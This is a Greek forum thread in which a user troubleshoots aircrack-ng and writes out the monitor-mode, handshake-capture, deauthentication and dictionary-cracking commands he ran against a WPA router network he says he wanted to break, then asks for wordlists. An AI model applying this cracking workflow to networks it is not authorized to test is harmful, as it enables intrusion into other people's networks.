* -w: καθορίζει το όνομα του αρχείου στο οποίο θα αποθηκευτεί το πακέτο που θα δημιουργηθεί

 

 

 

προτον πηρα τη καρτα δυκτιου γατι ειναι και πιο καινουργια γιατι το λαπτοπ κοντευη 5 χρονια

δευτερον εχω UBUNTU ΟΧΙ backtrack

τριτον ποια εκδοση aircrack να χρησημοπιησω ωστε να την βλεπει την καρτα δικτυου το pc giati δςν μου τιν αναγνοριζει οπως βλεπετε πιο πανο στο ποστ μου wlan1 Unknown usb - [phy1]

 

τεταρτον για να χρησημοπιησω το aircrack πρεπει να απενεργοποησω την καρτα δικτιου την μια η πρεπει να δουλεβουν και οι 2

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Δεν ευθυνεται το aircrack για το οτι δεν βλεπει την καρτα σου αλλα ο πυρηνας της διανομης. Ποιο ubuntu εχεις?

Για να παιξει θες 2.6.35, δηλαδη ubuntu 10.10 τουλαχιστον.

 

Πιο καινουρια καρτα απαιτει και νεοτερο πυρηνα προφανως.

 

Στο aircrack πρεπει να βαζεις το σωστο interface, το wlan1 στην περιπτωση σου.

Βεβαια, αν εχεις κανονικη εγκατασταση ubuntu και βγαλεις την παλια καρτα, η tp-link ακομα θα αναγνωριζεται ως wlan1.

Η δουλεια γινεται και με μια καρτα, εφοσον δεν χρησιμοποιεις την αλλη για "δολωμα", δηλαδη να συνδεθεις με εκεινη (την realtek) και να υποκλεπτεις με την tp-link (την atheros).

 

Btw, οι καρτες δεν απενεργοποιουνται, απλα δεν συνδεεσαι με αυτη και τερμα. Η καθε καρτα εχει τον δικο της driver που δουλευει ανεξαρτητα απο τον driver της αλλης.

Ομοιως, δεν πιστευω να εβαλες το aircrack με make install κλπ...

 

Βαλε ολο αυτο το copy paste σε spoiler tags γιατι καταντα κουραστικο το scroll για να προσπερασω το tutorial.

 

Spoiler tags = αυτα που εχουν αυτο σαν αποτελεσμα

 

Μητσος

 

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

λοιπων τελικα βρηκα λησει στο προβλημα μου ειταν τοσο απλο στο τελευτεο ποστ το καταλαβα τι πρεπει να γινει αλλα ειπαρχει ενα μικρο προβληματακι λοιπον τι εκανα ξανα εκανα format εβαλα backtrack ξανα εβαλα την ασυρματη καρτα tl-wn422g αυτην που αγορασα 20 ευρο :P χωρις drivers εκτελω την εντολη airmon-ng και μου βγαζει της καρτες επηλεγω την wlan0 με την εντολη airmon-ng start wlan0 την wlan1 δεν την πειραξα καθολου την wlan0 την εβαλα σε monitor mode και με την αλλην πηγα στη εφαρμογη network manager και προσπαθουσα να κανω συνδεση στο δικτιο που που ειθελα να σπασω με εναν λαθασμενο κωδικο που επηνοησα εγω μετα παταω την επηλογη στον τερματικο airodump-ng mon0 και τη γραμμη κατω του bssd μου της εβγαλε σε χρονο πολυ γρηγορο που αλλοτε δεν μου της εβγαζει καν μετα παταω την επηλογη airodump-ng -c 1 -w ThomsonWPA --output-format ivs mon0 επησης σε παραπολυ γρηγορο χρονο μου εβγαλε το handshake με τον τροπο που συνδεομουνα στο ρουτερ με λαθως κοδικο μετα πρεπει να κανω λαθωσ γιατι δινω την εντολη αυτη aireplay-ng -0 1 -e Thomson mon0 και μου βγαζει αυτα aireplay-ng -0 1 -e Thomson mon0

17:03:54 Waiting for beacon frame (ESSID: Thomson) on channel 1

17:04:04 No such BSSID available.

Please specify a BSSID (-a). μετα δυνω την εντολη aircrack-ng -w list.lst Thomson-01.ivs και μετα δυνω αυτο aircrack-ng -w list.lst Thomson-01.ivs και μου βγαζει αυτα fopen(dictionary) failed: No such file or directory

fopen(dictionary) failed: No such file or directory

Opening Thomson-01.ivs

Read 52 packets.

 

# BSSID ESSID Encryption

 

1 03:23:15:A5:44:44 Thomson619D4F WPA (1 handshake)

2 00:1f:1F:23:8F:8F SpeedTouch7C5685 Unknown

 

Index number of target network ? 1

 

Opening Thomson-01.ivs

Please specify a dictionary (optio

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

xaxaxaxaxaxaxa ξερω ορθογραφια απλα οταν γραφω γρηγορα δεν καθομαι να προσεξω το περημενα οτι καποια στιγμη θα το λεγατε χαχαχαχαχαχαχαχαχχαχαχ0αχ0α0χ0α0χ0α0χ0α0χ0α0χ0α0χ0α0χ0αχ0α0χ0α0χ0α0χ0α0χ0α0χα0χ0α0χ0αχ0α0χ0α0χ0α0χ0α0χ0α0χ0αχ0α0χ0α0χ0α0χ0αχ0α0χ0α0χ0α0χ0α0χα0χ0α0χ0α0χ0αχ0α0χ0αχ0α0χ0α0χα00χα0χα0χ0α0χα0χ0αχαχαχαχαχαχ

 

λοιπον αν εχετε να μου πρωτεινετε κατι ας μου το πειτε για το worldlist..................................................

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

χαχαχαχαχαχαχαχαχχαχαχ0αχ0α0χ0α0χ0α0χ0α0χ0α0χ0α0χ0α0χ0αχ0α0χ0α0χ0α0χ0α0χ0α0χα0χ0α0χ0αχ0α0χ0α0χ0α0χ0α0χ0α0χ0αχ0α0χ0α0χ0α0χ0αχ0α0χ0α0χ0α0χ0α0χα0χ0α0χ0α0χ0αχ0α0χ0αχ0α0χ0α0χα00χα0χα0χ0α0χα0χ0αχαχαχαχαχαχ

δεν φαντάστηκα ότι έχεις "άλοθι"!

 

η "εκπαιδευτική" διαδικασία για τις κλειδαριέςείναι εδώ

 

.

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Αρχειοθετημένο

Αυτό το θέμα έχει αρχειοθετηθεί και είναι κλειστό για περαιτέρω απαντήσεις.

  • Δημιουργία νέου...